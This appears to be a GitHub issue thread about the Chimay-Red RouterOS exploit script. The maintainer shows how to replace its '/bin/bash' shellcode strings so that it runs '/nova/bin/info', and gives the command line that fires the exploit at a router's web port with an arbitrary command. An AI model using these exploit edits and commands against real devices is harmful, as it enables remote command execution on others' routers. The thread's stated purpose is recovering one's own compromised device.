Got stuck rewriting shellcode

[Zveroloff]

Could you help with editing the shellcode? I want to send just /nova/bin/info, bypassing bash shell

[BigNerd95]

Why do you want edit the shell code? Just write this command:

./StackClash_mips.py 192.168.8.1 80 www_binary '/nova/bin/info "your_mikrotik_command" '

[Zveroloff]

I want to rewrite it, because I'm dealing with already hacked device, and standard way is not working. Because the device is accessible by port 80 and reports the same (vulnerable) RouterOS version, my idea is to rewrite the shellcode to run just system utility, not bash. Possibly, the attackers made something to bash

[BigNerd95]

So edit this line https://github.com/BigNerd95/Chimay-Red/blob/master/StackClash_mips.py#L126 Replace

shell_code += b'/bin/bash\x00' 

with

shell_code += b'/nova/bin/info\x00' 

Edit line https://github.com/BigNerd95/Chimay-Red/blob/master/StackClash_mips.py#L129 Replace

shell_code += b'-c\x00'

with

shell_code += b'\x20\x00'

Now you can use it:

./StackClash_mips.py 192.168.8.1 80 www_binary "your_mikrotik_command"

I didn't test this mods, but i think they will work

[Zveroloff]

Thanks, I thought about this, but this way I'll get execve("/nova/bin/info", ["/nova/bin/info", " ", "user_command"]), is it normal to repeat executable in parameter array?

[BigNerd95]

...yes http://man7.org/linux/man-pages/man2/execve.2.html

argv is an array of argument strings passed to the new program.  By
       convention, the first of these strings (i.e., argv[0]) should contain
       the filename associated with the file being executed.

[Zveroloff]

Oh, thank you!